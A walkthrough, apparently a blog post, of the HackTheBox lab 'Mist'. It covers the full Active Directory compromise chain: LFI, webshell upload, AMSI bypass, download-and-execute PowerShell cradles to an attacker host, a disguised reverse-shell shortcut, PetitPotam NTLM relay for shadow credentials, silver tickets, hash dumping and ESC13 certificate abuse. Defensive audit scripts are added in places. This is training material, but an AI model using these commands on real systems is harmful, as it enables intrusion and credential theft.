HTB - Mist

Description
Mist is an Insane-difficulty machine that provides a comprehensive scenario for exploiting various misconfigurations and vulnerabilities in an Active Directory (AD) environment. The machine has multiple layers, starting with a public-facing CMS running on Apache with a path traversal vulnerability, allowing us to retrieve a backup file containing hashed credentials. Cracking this hash grants initial access as a low-privileged web user. Exploiting file-write permissions on a shared directory further elevates our access by allowing a reverse shell connection as another domain user. From there, enumeration reveals several AD misconfigurations, including LDAP signing disabled, WebDAV exploitation, and misconfigurations in ADCS templates, each step designed to escalate privileges through different AD entities. The final exploit involves creating shadow credentials to acquire the machine account's NTLM hash, enabling a DCSync attack to obtain the Domain Administrator hash.
Enumeration
Nmap Scan
nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
80/tcp open http
nmap -sCV -p80 $ip -Pn -oN Nmap/Script-scan
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
HTTP
http://10.10.11.17?file=mist

When I clicked the word admin, I was redirected to this login page.

The pluck version is 4.7.18. A quick search for that version on the exploit-db site leads to this CVE, but I don't have the admin password yet.

After searching further for other pluck CVEs, I found an unauthenticated LFI.

Vulnerability Details

Following this post, I looked under the /data/settings/modules/albums folder and found admin_backup.php.

When I included admin_backup.php, I got a hash, so I will try to crack it.

On https://crackstation.net/, I was able to crack it

Initial Access
When I used the cracked password to log in as admin, I was redirected to the admin portal


Now, with the admin password, I can get RCE via the CVE found before. I read the exploit and decided to perform it manually rather than using the PoC.
First, go to http://10.10.11.17/admin.php?action=installmodule

Second, create a zip file containing a PHP shell. I will use p0wny shell and upload it as a module:
zip module.zip p0wny.php

Finally, access the webshell at http://10.10.11.17/data/modules/module/p0wny.php

I will upgrade my shell with PowerJoker to get more flexibility because the installed modules don't persist. Maybe there is a script in the background removing them.

Lateral Movement
Looking at the ports listening internally, there are RPC, SMB, and WinRM. That confirms there are firewall rules blocking most inbound connections to MS01.
JokerShell C:\xampp\htdocs\data> netstat -ano | findstr TCP
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2412
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 852
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2412
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
..snip..
Looking at the IP configuration, I found that MS01 has a different IP, 192.168.100.101, with the hostname ms01.mist.htb.
JokerShell C:\> ipconfig
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.100.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.100
JokerShell C:\> nslookup ms01
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 192.168.100.100
Name: ms01.mist.htb
Address: 192.168.100.101
I also wanted to check the AV status, so I ran Get-MpComputerStatus and found that Defender is running on the box.
JokerShell C:\Users\svc_web> Get-MpComputerStatus
AMEngineVersion : 1.1.24020.9
AMProductVersion : 4.18.24020.7
AMRunningMode : Normal
AMServiceEnabled : True
AMServiceVersion : 4.18.24020.7
AntispywareEnabled : True
AntispywareSignatureAge : 378
AntispywareSignatureLastUpdated : 3/26/2024 4:22:59 AM
AntispywareSignatureVersion : 1.407.725.0
AntivirusEnabled : True
AntivirusSignatureAge : 378
AntivirusSignatureLastUpdated : 3/26/2024 4:22:59 AM
AntivirusSignatureVersion : 1.407.725.0
BehaviorMonitorEnabled : True
I want to find a possible escalation path on ms01, so I uploaded winpeas.ps1 and PowerUp.ps1 to the box, but since AV is enabled, I had to bypass AMSI first. I created a bypass.ps1 containing a common AMSI bypass (patching AmsiScanBuffer), then loaded the PowerUp.ps1 script:
iex(iwr -UseBasicParsing 10.10.16.4/bypass.ps1)
iex(iwr -UseBasicParsing 10.10.16.4/PowerUp.ps1); Invoke-AllChecks
Unfortunately, I didn't find any exploitation path with the PowerUp tool, but under C:\ there is an uncommon folder.
JokerShell C:\> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2024 1:50 AM Common Applications
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 2/20/2024 5:44 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 2/21/2024 12:37 PM Users
d----- 3/26/2024 12:02 PM Windows
d----- 3/10/2024 3:21 AM xampp
JokerShell C:\Common Applications> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 1:15 AM 1118 Calculator.lnk
-a---- 5/7/2021 3:14 PM 1175 Notepad.lnk
-a---- 5/7/2021 3:15 PM 1171 Wordpad.lnk
They are .lnk shortcut files that launch common programs on the system.
JokerShell C:\Common Applications> type Calculator.lnk
L?F?)@%SystemRoot%\system32\shell32.dll,-22531%windir%\system32\win32calc.exef ?-1SPS??XF?L8C???&?m?-1SPSU(L?y?9K????-????%windir%\system32\win32calc.exe%windir%\system32\win32calc.exe
What if I can overwrite one of them so that it executes a reverse shell when someone uses it? First, I need to check my permissions on this folder.
JokerShell C:\> icacls 'Common Applications'
Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F)
MS01\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX,W)
From the output above, BUILTIN\Users has write access on the folder (RX,W).
On my Windows host, I created a new shortcut.

In the Target field, I put this payload; rev.ps1 contains an encoded reverse shell:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex(iwr -UseBasicParsing 10.10.16.4/rev.ps1)
Also, I changed the icon to the Calculator icon from C:\Windows\System32\calc.exe to make it look as convincing as possible.

Now, I will upload it to the box
iwr 10.10.16.4/Calculator.lnk -outfile .\Calculator.lnk
After a short time (1-2 mins), I got a shell as brandon.keywarp
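The two conditions this step relied on (a shortcut folder writable by ordinary users, and a shortcut that silently launches a script host) are both cheap to audit. The script below is an added example for defenders and is not part of the original write-up or of any tool it uses; it relies only on built-in cmdlets and the WScript.Shell COM object, and the folder list is an assumption taken from this write-up.

```powershell
# Added example, not part of the original write-up: audit folders that hold
# shared .lnk shortcuts for the two conditions abused above: non-admin write
# access on the folder, and a shortcut whose target is a script host. Only
# built-in cmdlets and the WScript.Shell COM object are used; the folder list
# is an assumption taken from the write-up. Run it on the host being audited.

$LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

# Rights that let a non-admin replace or delete a file in the folder. Pure
# write bits only: composite rights such as Modify or FullControl contain
# WriteData and so still match, while ReadAndExecute does not.
$WriteBits = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership)
$GenericWriteOrAll = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL on unmapped ACEs

# Script hosts and LOLBins a shortcut to a GUI application should never launch
$ScriptHosts = @('powershell.exe','pwsh.exe','cmd.exe','wscript.exe','cscript.exe','mshta.exe','rundll32.exe','regsvr32.exe')
$DownloadOrEvalPattern = 'iex|invoke-expression|iwr|invoke-webrequest|downloadstring|-enc|http'

function Get-WeakShortcutFolderAce {
    param([Parameter(Mandatory)][string]$Folder)
    foreach ($ace in (Get-Acl -Path $Folder).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band $WriteBits) -eq 0 -and ($rights -band $GenericWriteOrAll) -eq 0) { continue }
        [pscustomobject]@{
            Folder    = $Folder
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights.ToString()
            Inherited = $ace.IsInherited
        }
    }
}

function Get-SuspiciousShortcut {
    param([Parameter(Mandatory)][string]$Folder)
    $shell = New-Object -ComObject WScript.Shell
    foreach ($file in Get-ChildItem -Path $Folder -Filter *.lnk -File -Recurse) {
        $lnk = $shell.CreateShortcut($file.FullName)   # loads the existing shortcut
        $targetName = ([string][System.IO.Path]::GetFileName([string]$lnk.TargetPath)).ToLower()
        $iconFile = ([string]$lnk.IconLocation -split ',')[0].Trim()
        $reasons = @()
        if ($ScriptHosts -contains $targetName) {
            $reasons += "target is script host $targetName"
            # A borrowed icon (calc.exe on a powershell.exe target) is the disguise used above
            if ($iconFile -and ([System.IO.Path]::GetFileName($iconFile)).ToLower() -ne $targetName) {
                $reasons += "icon taken from $iconFile"
            }
        }
        if ([string]$lnk.Arguments -match $DownloadOrEvalPattern) { $reasons += 'arguments download or evaluate code' }
        if ($reasons.Count -eq 0) { continue }
        [pscustomobject]@{
            Shortcut  = $file.FullName
            Target    = $lnk.TargetPath
            Arguments = $lnk.Arguments
            Modified  = $file.LastWriteTime
            Reasons   = ($reasons -join '; ')
        }
    }
}

# Assumed folders: the one from the write-up plus the all-users Start Menu
foreach ($folder in @('C:\Common Applications', "$env:ProgramData\Microsoft\Windows\Start Menu\Programs")) {
    if (-not (Test-Path -LiteralPath $folder)) { continue }
    Get-WeakShortcutFolderAce -Folder $folder | Format-Table -AutoSize
    Get-SuspiciousShortcut    -Folder $folder | Format-List
}
```

On this box the first function would report the BUILTIN\Users (RX,W) entry seen in the icacls output, and the second would flag the replaced Calculator.lnk on all three counts: a powershell.exe target, an iwr/iex argument string, and an icon borrowed from calc.exe. The fix is to strip write rights for non-admin principals from any folder whose shortcuts are launched by other users, and to alert on recent LastWriteTime changes in such folders.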

The user is indeed a domain user, and it has a profile folder alongside the other users.
JokerShell C:\> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ==============================================
mist\brandon.keywarp S-1-5-21-1045809509-3006658589-2426055941-1110
JokerShell C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/8/2025 1:00 PM Administrator
d----- 2/20/2024 6:02 AM Administrator.MIST
d----- 4/8/2025 1:00 PM Brandon.Keywarp
d-r--- 2/20/2024 5:44 AM Public
d----- 2/20/2024 9:39 AM Sharon.Mullard
d----- 4/8/2025 12:59 PM svc_web
I can guess that Sharon.Mullard is a domain user, too.
At this point, with a domain user, I have to pivot to enumerate the domain controller with ligolo-ng. On the Linux attack host:
./proxy -selfcert
On the Windows box (MS01), run:
JokerShell C:\xampp\htdocs> iwr 10.10.16.4/agent.exe -outfile .\agent.exe
JokerShell C:\xampp\htdocs> Start-Process agent.exe -ArgumentList "-connect 10.10.16.4:11601 -ignore-cert"
Make sure you're in C:\xampp\htdocs, because that folder is excluded from Defender.
After pivoting, I can run Nmap and see the results:
nmap -iL ip.txt -F -Pn
Nmap scan report for 192.168.100.100
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
Nmap scan report for 192.168.100.101
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Looking for remote management ports, I found WinRM running on both hosts:
nmap -iL ip.txt -p5985,3389,5986 --open
Nmap scan report for 192.168.100.100
PORT STATE SERVICE
5985/tcp open wsman
Nmap scan report for 192.168.100.101
PORT STATE SERVICE
5985/tcp open wsman
Script scan of the DC:
nmap -sCV -p53,88,135,139,389,445,5985 192.168.100.100 -oN Nmap/dc-scan
Nmap scan report for 192.168.100.100
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-08 20:46:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mist.htb0., Site: Default-First-Site-Name)
| Subject Alternative Name: DNS:DC01.mist.htb
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
I will add the two machines to my /etc/hosts file:
echo '192.168.100.100 dc01 dc01.mist.htb mist.htb' | sudo tee -a /etc/hosts
echo '192.168.100.101 ms01 ms01.mist.htb' | sudo tee -a /etc/hosts
My next move is to enumerate both the shared folders and the domain ACLs with BloodHound, so I will upload SharpHound.exe to the host and begin the collection. I still couldn't access the shared folders without credentials:
nxc smb ip.txt -u 'guest' -p '' --shares
SMB 192.168.100.100 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB 192.168.100.101 445 MS01 [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED
SMB 192.168.100.100 445 DC01 [-] mist.htb\guest: STATUS_ACCOUNT_DISABLED
nxc smb ip.txt -u '' -p '' --shares
SMB 192.168.100.100 445 DC01 [+] mist.htb\:
SMB 192.168.100.100 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
SMB 192.168.100.101 445 MS01 [-] mist.htb\: STATUS_ACCESS_DENIED
Privilege Escalation (MS01)
I didn't find anything useful so far, so there is an attack I have to try: NTLM relay over LDAP using WebDAV. This post is useful for performing the attack: Post
I already know what to do, so I will proceed directly with these steps:
1. Check if WebDAV is running.
2. If WebDAV is not running, try to enable it.
3. Use any coercion method (printerbug, PetitPotam, coercer, etc.) to force the machine to authenticate to my host.
4. Set up a relay agent on my host to relay the authentication coming in over HTTP (WebDAV) to LDAP and perform an RBCD or Shadow Credentials attack.
Performing RBCD depends on having an account with an SPN or the ability to create a machine account, whereas Shadow Credentials depends on PKINIT authentication (usually available when ADCS is installed).
When I enumerated the domain to see whether I can add a computer account, I found that ms-ds-machineaccountquota is zero, so I can't.
JokerShell C:\xampp\htdocs> Get-DomainObject -Identity "DC=mist,DC=htb" -Properties ms-DS-MachineAccountQuota
ms-ds-machineaccountquota
-------------------------
0
When I checked the MS01 computer object, I found that msds-keycredentiallink already contains a value, so a Shadow Credentials attack is possible.
JokerShell C:\xampp\htdocs> Get-DomainObject -Identity MS01 -Properties msds-keycredentiallink
msds-keycredentiallink
----------------------
B:828:0002000020000119F0F375256AB2B1C4FC2BDFEFAD0D21AA3D5C36890AED2D7F6FE4F3DAB2C9A62000020F090A50EB5AEE1B926A4341..snip..
Now, let's deal with WebDAV. I downloaded SharpWebClientScanner.exe to query its status, but I didn't find it running on any host, so I have to enable it manually.
JokerShell C:\xampp\htdocs> .\SharpWebClientScanner.exe --domain mist.htb
By Mor David
[x] Unable to reach DAV pipe on MS01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on DC01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on svc_ca, system is either unreachable or does not have WebClient service running
I will use this tool to enable it from Windows. First, compile it on Linux with Mono:
sudo apt install mono-complete
mcs EtwStartWebClient.cs -out:EtwStartWebClient.exe /unsafe
iwr 10.10.16.4:8000/EtwStartWebClient.exe -o .\EtwStartWebClient.exe
Verify with SharpWebClientScanner

Then, execute the tool on Windows:
JokerShell C:\xampp\htdocs> .\EtwStartWebClient.exe
[+] WebClient Service started successfully
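Every precondition listed above (MachineAccountQuota, an existing key credential on the computer object, a startable WebClient service, and an LDAP service that accepts a relayed, unsigned bind) is something a domain admin can read back from the directory and the DCs. The script below is an added defender-side audit, not part of the original write-up or of any of the tools it uses; it needs the RSAT ActiveDirectory module, WinRM to the DCs and member servers, and the host names it checks are assumptions taken from this write-up.

```powershell
# Added example, not part of the original write-up: audit the preconditions
# the WebDAV -> LDAP relay / shadow credential chain above depends on. Needs the
# RSAT ActiveDirectory module and WinRM access to the DCs; the member server
# list is an assumption taken from the write-up.
Import-Module ActiveDirectory

$Domain  = Get-ADDomain
$DCs     = @((Get-ADDomainController -Filter *).HostName)
$Members = @('ms01.mist.htb')   # assumed: member servers whose WebClient service should be checked

function Get-MachineAccountQuota {
    (Get-ADObject -Identity $Domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

function Get-KeyCredentialLinkHolder {
    # Accounts carrying msDS-KeyCredentialLink. Windows Hello for Business and
    # hybrid-joined devices populate this legitimately, so compare against the
    # expected set instead of treating every hit as hostile. whenChanged gives
    # a cheap first indication of a recent write.
    Get-ADObject -LDAPFilter '(&(|(objectClass=computer)(objectClass=user))(msDS-KeyCredentialLink=*))' `
                 -Properties 'msDS-KeyCredentialLink', whenChanged |
        Select-Object Name, ObjectClass, whenChanged,
            @{ n = 'KeyCount'; e = { @($_.'msDS-KeyCredentialLink').Count } }
}

function Get-LdapHardening {
    # LDAPServerIntegrity 2 = signing required; LdapEnforceChannelBinding 2 =
    # channel binding always enforced. Anything else lets a relayed NTLM bind
    # over LDAP (or LDAPS) succeed against that DC.
    foreach ($dc in $DCs) {
        $p = Invoke-Command -ComputerName $dc -ScriptBlock {
            Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
        }
        [pscustomobject]@{
            DC                  = $dc
            LDAPServerIntegrity = $p.LDAPServerIntegrity
            ChannelBinding      = $p.LdapEnforceChannelBinding
            SigningRequired     = ($p.LDAPServerIntegrity -eq 2)
            CBTEnforced         = ($p.LdapEnforceChannelBinding -eq 2)
        }
    }
}

function Get-WebClientState {
    # The WebClient (WebDAV) service is what lets a coerced host authenticate
    # over HTTP instead of SMB. It is trigger-started, so 'Stopped' alone is
    # not a safe state; only 'Disabled' (or absent) is.
    foreach ($h in ($DCs + $Members)) {
        $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='WebClient'" -ComputerName $h -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Host      = $h
            Present   = [bool]$svc
            State     = $svc.State
            StartMode = $svc.StartMode
            Safe      = (-not $svc) -or ($svc.StartMode -eq 'Disabled')
        }
    }
}

"ms-DS-MachineAccountQuota: $(Get-MachineAccountQuota)  (0 blocks the RBCD variant; shadow credentials are unaffected)"
Get-KeyCredentialLinkHolder | Format-Table -AutoSize
Get-LdapHardening           | Format-Table -AutoSize
Get-WebClientState          | Format-Table -AutoSize
```

Read against this box: the quota is already 0, so only the shadow credential branch is open; MS01$ shows up in the key credential list; the WebClient service is present and startable on MS01; and the write-up's description notes LDAP signing is disabled, which is exactly what the SigningRequired and CBTEnforced columns would show as False. Requiring LDAP signing and channel binding on every DC removes the relay target regardless of how the coercion is done, and disabling WebClient on servers removes the HTTP leg that makes the relay to LDAP possible in the first place.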
Now I need to use a coercion method, but that requires credentials. I only have a shell as the domain user brandon.keywarp, with no password or hash. One way to get the user's hash is to use an ADCS template to request a certificate for the user and then recover their NT hash from it.
First, upload Certify to the machine and request a certificate for the current user:
.\Certify.exe request /template:User /ca:DC01\mist-DC01-CA

Copy cert.pem (private key and certificate), then convert it to PFX with this command:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
With Certipy, I can authenticate to the domain and get the hash:
certipy-ad auth -pfx cert.pfx -domain mist.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: brandon.keywarp@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'brandon.keywarp.ccache'
[*] Trying to retrieve NT hash for 'brandon.keywarp'
[*] Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1xxxxxxxxxxx
For WebDAV to work, it needs a hostname to connect to, but my host isn't reachable from the internal network, so I will add a port-forwarding rule so that any connection arriving at ms01 on port 8888 is forwarded to port 80 on my host:
[Agent : MIST\Brandon.Keywarp@MS01] » listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80 --tcp
INFO[8701] Listener 0 created on remote agent!
Since we found earlier that MS01$ already has a keyCredentialLink value, we need a tool that can clear it and add a new one. This is included in the version of ntlmrelayx.py from this pull request, which added that feature:
git clone https://github.com/fortra/impacket/ && cd impacket; git fetch origin pull/1402/head:mist && git checkout mist;
python -m venv . && source ./bin/activate; pip install . && pip install -r requirements.txt && pip install pyOpenSSL==24.0.0 && pip install setuptools
Execute the attack
python3 PetitPotam.py -u 'brandon.keywarp' -hashes :db03d6a77a2205bc1d07082740626cc9 MS01@8888/files 192.168.100.101
sudo ntlmrelayx.py -debug -t ldaps://192.168.100.100 -i -smb2support -domain mist.htb

nc localhost 11000
$ clear_shadow_creds ms01$
$ set_shadow_creds ms01$

Convert the certificate into a PFX suitable for Certipy:
certipy-ad cert -export -pfx /home/kali/vault/Hacking/Mist/impacket/e1LybMof.pfx -password 'y5hd2VIzZgXcGREYy0uJ' -out cert.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'cert.pfx'
Authenticate to the DC using the certificate and get the NT hash of the computer account:
certipy-ad auth -pfx cert.pfx -domain mist.htb -username 'MS01$' -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:17749fa7409ac85c4zzzzzzzzzzzz
With the computer account hash, I can forge a Silver Ticket for the CIFS service and access the file system as Administrator:
impacket-ticketer -nthash 17749fa7409ac85c4zzzzzzzzzzzz -domain mist.htb -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -spn cifs/ms01.mist.htb Administrator
export KRB5CCNAME=`pwd`/Administrator.ccache
Access the machine as an administrator
impacket-wmiexec -k -no-pass MS01.MIST.HTB
[*] SMBv3.0 dialect used
C:\>whoami
mist.htb\administrator
I will dump the SAM to save my progress:
impacket-secretsdump -no-pass -k ms01.mist.htb
[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c40xxxxxxxx:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39bxxxxxxxxx:::
Connect to the box with a local admin account:
evil-winrm -i ms01 -u Administrator -H 711e6a685af1c31c402xxxxxxxxxxxx
*Evil-WinRM* PS C:\Users> type Administrator\Desktop\user.txt
User Flag: 0c63be3b856709838ec62a926dbad528
Privilege Escalation (DC01)
Inside the Sharon.Mullard profile folder, there are several files:
*Evil-WinRM* PS C:\Users\Sharon.Mullard> tree /F
C:.
+---Desktop
+---Documents
|       sharon.kdbx
|
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
|       cats.png
|       image_20022024.png
The .kdbx file is a KeePass password database, so it will be protected by a password.
cats.png contains nothing but pictures of cats.

image_20022024.png has something interesting:

A string that has been partially hidden and encoded using base64:
UA7cpa[#1!_*ZX
I will try it against the KeePass hash, but I think I will need a brute-force attack with hashcat. First, extract the hash from the KeePass database:
keepass2john sharon.kdbx > keepass.hash
The input in the image was 15 characters and the string I have is 14, so I only need to append one ?a, hashcat's mask for any printable character:
hashcat -m 13400 -a 3 keepass.hash 'UA7cpa[#1!_*ZX?a'
..snip..
$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d5871520815f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc:UA7cpa[#1!_xxxxx
Session..........: hashcat
Status...........: Cracked
To open the KeePass file on Linux, I used KeePassXC:
sudo apt install keepassxc
keepassxc sharon.kdbx

Trying the password against all the users I don't have credentials for yet, I got one hit:
nxc ldap dc01 -u users.lst -p 'ImTiredxxxxxxx'
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Florence.Brown:xxxxxxxxxxxxxxxxx
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Jonathan.Clinton:xxxxxxxxxxxxxxxxx
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Markus.Roheb:xxxxxxxxxxxxxxxxx
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Shivangi.Sumpta:xxxxxxxxxxxxxxxxx
LDAP 192.168.100.100 389 DC01 [-] mist.htb\Harry.Beaucorn:xxxxxxxxxxxxxxxxx(
LDAP 192.168.100.100 389 DC01 [+] mist.htb\op_Sharon.Mullard:xxxxxxxxxxxxxxxxx
Looking at BloodHound CE, the user op_Sharon.Mullard is a member of the operatives group, which has ReadGMSAPassword over Svc_CA$:

┌─[kali@parrot]─[~/HackTheBox/platform/machines/mist]
└──╼ $nxc ldap dc01 -u op_Sharon.Mullard -p 'ImTirxxxxxxxxx' --gmsa
LDAPS 192.168.100.100 636 DC01 [*] Getting GMSA Passwords
LDAPS 192.168.100.100 636 DC01 Account: svc_ca$ NTLM:09814d63c9baxxxxxxxxxxxx
SVC_CA$ can add a KeyCredentialLink (Shadow Credential) to svc_cabackup:

certipy-ad shadow auto -u 'svc_ca$@mist.htb' -hashes :09814d63c9baxxxxxxxxxxxx -account svc_cabackup

ESC13: If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
Source post.
From BloodHound, I can see that as a member of the Certificate Services group, I can abuse ESC13 and add myself, or anyone I want, to the Certificate Managers group.

The Certificate Managers group is a member of the CA Backup group.

A member of the CA Backup group can perform ESC13 too, and get membership in the Services accounts group, which is a member of the Backup Operators group.

To summarize the attack path:
1. Perform ESC13 to inherit the privileges of the Certificate Managers group.
2. Perform ESC13 again to inherit the privileges of the Services accounts group.
3. Inherit Backup Operators privileges by being in the Services accounts group.
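The whole chain rests on three directory objects that can be listed in one pass: issuance policies whose msDS-OIDToGroupLink points at a group, certificate templates that reference those policies, and the principals allowed to enroll in them. The script below is an added defender-side audit and is not part of the original write-up, of Certipy or of BloodHound; it needs the RSAT ActiveDirectory module and read access to the Configuration partition, and nothing from this lab is hard-coded.

```powershell
# Added example, not part of the original write-up: enumerate the ESC13
# building blocks described above - issuance policies that carry an OID group
# link, the templates that reference them, and who may enroll in those
# templates. Needs the RSAT ActiveDirectory module; nothing lab-specific is
# hard-coded.
Import-Module ActiveDirectory

$ConfigNC     = (Get-ADRootDSE).configurationNamingContext
$PkiContainer = "CN=Public Key Services,CN=Services,$ConfigNC"
$EnrollGuid   = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
# EKUs that make a certificate usable for Kerberos logon; an empty EKU list means any purpose
$LogonEkus    = @('1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.20.2.2', '1.3.6.1.5.2.3.4', '2.5.29.37.0')

function Get-LinkedIssuancePolicy {
    # Issuance policies are msPKI-Enterprise-Oid objects under CN=OID. The KDC
    # only honours the link for a universal group with no members, so both
    # facts are reported next to the policy.
    Get-ADObject -SearchBase "CN=OID,$PkiContainer" `
        -LDAPFilter '(&(objectClass=msPKI-Enterprise-Oid)(msDS-OIDToGroupLink=*))' `
        -Properties displayName, 'msPKI-Cert-Template-OID', 'msDS-OIDToGroupLink' |
    ForEach-Object {
        $grp = Get-ADGroup -Identity $_.'msDS-OIDToGroupLink' -Properties members
        [pscustomobject]@{
            Policy      = $_.displayName
            OID         = $_.'msPKI-Cert-Template-OID'
            LinkedGroup = $grp.Name
            GroupScope  = $grp.GroupScope
            GroupEmpty  = (@($grp.members).Count -eq 0)
        }
    }
}

function Get-TemplateUsingPolicy {
    param([Parameter(Mandatory)][string]$PolicyOid)
    # Templates reference issuance policies in msPKI-Certificate-Policy.
    Get-ADObject -SearchBase "CN=Certificate Templates,$PkiContainer" `
        -LDAPFilter "(&(objectClass=pKICertificateTemplate)(msPKI-Certificate-Policy=$PolicyOid))" `
        -Properties pKIExtendedKeyUsage, nTSecurityDescriptor |
    ForEach-Object {
        $ekus = @($_.pKIExtendedKeyUsage)
        # Enroll right, or a right that lets the holder grant Enroll to themselves
        $enrollers = @($_.nTSecurityDescriptor.Access |
            Where-Object { $_.AccessControlType -eq 'Allow' -and
                           ($_.ObjectType -eq $EnrollGuid -or
                            $_.ActiveDirectoryRights -match 'GenericAll|WriteDacl|WriteOwner') } |
            ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique)
        [pscustomobject]@{
            Template  = $_.Name
            LogonEku  = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $LogonEkus -contains $_ })
            Enrollers = ($enrollers -join ', ')
        }
    }
}

foreach ($p in Get-LinkedIssuancePolicy) {
    "Issuance policy '$($p.Policy)' ($($p.OID)) -> group '$($p.LinkedGroup)' [scope=$($p.GroupScope), empty=$($p.GroupEmpty)]"
    Get-TemplateUsingPolicy -PolicyOid $p.OID | Format-Table -AutoSize
}
```

Any row where LogonEku is True and Enrollers contains a broad or low-privilege principal is an ESC13 path into the linked group, and the linked group's own nesting (here Certificate Managers inside CA Backup, and Services accounts inside Backup Operators) decides how far it reaches. Removing the OID group link, narrowing the template's enrollment ACL, or taking the linked group out of privileged groups such as Backup Operators each breaks the chain on its own.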
Request a certificate from the vulnerable template managerauthentication:
certipy-ad req -u 'svc_cabackup@mist.htb' -hashes :c9872f1bc10bdd522c12fc2ac9041b64 -template managerauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100
Authenticate as svc_cabackup to inherit the new privileges:
certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb
impacket-ticketConverter svc_cabackup.kirbi svc_cabackup.ccache

